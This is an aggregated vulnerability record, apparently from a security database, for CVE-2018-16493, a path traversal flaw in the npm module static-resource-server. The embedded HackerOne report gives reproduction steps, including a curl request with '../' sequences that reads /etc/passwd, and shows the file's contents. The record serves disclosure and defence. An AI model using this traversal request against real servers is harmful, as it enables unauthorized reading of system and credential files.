ID: NODEJS:967
Type: nodejs
Reporter: libcontainer
Modified: 2019-06-18T19:59:57
Description
Overview
All versions of static-resource-server are vulnerable to Path Traversal. Due to insufficient input sanitization, attackers can access server files by using relative paths.
Recommendation
No fix is currently available. Consider using an alternative module until a fix is made available.
{"id": "NODEJS:967", "type": "nodejs", "bulletinFamily": "software", "title": "Path Traversal", "description": "## Overview\n\nAll versions of `static-resource-server` are vulnerable to Path Traversal. Due to insufficient input sanitization, attackers can access server files by using relative paths. \n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative module until a fix is made available.\n\n\n## References\n\n- [HackerOne Report](https://hackerone.com/reports/432600)", "published": "2019-06-14T15:26:57", "modified": "2019-06-18T19:59:57", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://www.npmjs.com/advisories/967", "reporter": "libcontainer", "references": [], "cvelist": ["CVE-2018-16493"], "lastseen": "2020-09-29T11:10:42", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-16493"]}, {"type": "hackerone", "idList": ["H1:432600"]}, {"type": "github", "idList": ["GHSA-45J8-PM75-5V8X"]}, {"type": "nodejs", "idList": ["NODEJS:968"]}], "modified": "2020-09-29T11:10:42", "rev": 2}, "score": {"value": 6.3, "vector": "NONE", "modified": "2020-09-29T11:10:42", "rev": 2}, "vulnersScore": 6.3}, "affectedSoftware": [{"name": "static-resource-server", "operator": "ge", "version": "0"}]}
{"cve": [{"lastseen": "2021-02-02T06:52:31", "description": "A path traversal vulnerability was found in module static-resource-server 1.7.2 that allows unauthorized read access to any file on the server by appending slashes in the URL.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-02-01T18:29:00", "title": "CVE-2018-16493", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-16493"], "modified": "2019-10-09T23:36:00", "cpe": ["cpe:/a:static-resource-server_project:static-resource-server:1.7.2"], "id": "CVE-2018-16493", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-16493", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:static-resource-server_project:static-resource-server:1.7.2:*:*:*:*:node.js:*:*"]}], "hackerone": [{"lastseen": "2019-03-24T08:19:02", "bulletinFamily": "bugbounty", "bounty": 0.0, "cvelist": ["CVE-2018-16493"], "description": "# Module\n\n**module name:** static-resource-server\n**version:** 1.7.2\n**npm page:** `https://www.npmjs.com/package/static-resource-server`\n\n## Module 
Description\n\n> A tiny http server that provides local static resource access \n\n## Module Stats\n\n> Replace stats below with numbers from npm\u2019s module page:\n\n[0] downloads in the last day\n[0] downloads in the last week\n[12] downloads in the last month\n\n~ 639 Downloads per Year\n\n# Vulnerability\n\n## Vulnerability Description\n\n> Directory traversal through the url which doesn't verify the file is from the root directory path.\n\n## Steps To Reproduce:\n\n> install static-resource-server using npm\n\n`$ npm install static-resource-server`\n\nrun server from command line:\n\n`$ ./static-resource-server -P 8080 --root $HOME/data/static`\n\nuse curl to try accessing internal files\n\n`$ curl --path-as-is --url 'http://127.0.0.1:8080/../../../../etc/passwd' `\n\nNow the corresponding file will be loaded from the server and sent as response to the client ( curl )\n\nResult:\n\n```\n##\n# User Database\n# \n# Note that this file is consulted directly only when the system is running\n# in single-user mode. 
At other times this information is provided by\n# Open Directory.\n#\n# See the opendirectoryd(8) man page for additional information about\n# Open Directory.\n##\nnobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false\nroot:*:0:0:System Administrator:/var/root:/bin/sh\ndaemon:*:1:1:System Services:/var/root:/usr/bin/false\n_uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico\n_taskgated:*:13:13:Task Gate Daemon:/var/empty:/usr/bin/false\n_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false\n_installassistant:*:25:25:Install Assistant:/var/empty:/usr/bin/false\n<<< MASKED DATA >>>\n```\n\n\n## Supporting Material/References:\n\n- MacOS 10.14.1 \n- Node version v10.11.0\n- npm version 6.4.1\n\n# Wrap up\n\n- I contacted the maintainer to let them know: No\n- I opened an issue in the related repository: No\n\n## Impact\n\nThis vulnerability allows to read content of any file on the server", "modified": "2019-01-03T19:02:03", "published": "2018-11-01T06:25:40", "id": "H1:432600", "href": "https://hackerone.com/reports/432600", "type": "hackerone", "title": "Node.js third-party modules: [static-resource-server] Path Traversal allows to read content of arbitrary file on the server", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "nodejs": [{"lastseen": "2020-09-29T11:10:42", "bulletinFamily": "software", "cvelist": ["CVE-2018-16493"], "description": "## Overview\n\nVersions of `simplehttpserver` prior to 0.2.1 are vulnerable to Path Traversal. Due to insufficient input sanitization, attackers can access server files by using relative paths. 
\n\n## Recommendation\n\nUpgrade to version 0.2.1 or later.\n\n## References\n\n- [HackerOne Report](https://hackerone.com/reports/357109)", "modified": "2019-06-18T19:59:37", "published": "2019-06-14T15:35:55", "id": "NODEJS:968", "href": "https://www.npmjs.com/advisories/968", "type": "nodejs", "title": "Path Traversal", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "github": [{"lastseen": "2021-01-08T23:37:15", "bulletinFamily": "software", "cvelist": ["CVE-2018-16493"], "description": "Versions of `simplehttpserver` prior to 0.2.1 are vulnerable to Path Traversal. Due to insufficient input sanitization, attackers can access server files by using relative paths. \n\n\n## Recommendation\n\nUpgrade to version 0.2.1 or later.", "edition": 4, "modified": "2021-01-08T19:57:26", "published": "2019-02-07T18:18:04", "id": "GHSA-45J8-PM75-5V8X", "href": "https://github.com/advisories/GHSA-45j8-pm75-5v8x", "title": "Path Traversal in simplehttpserver", "type": "github", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}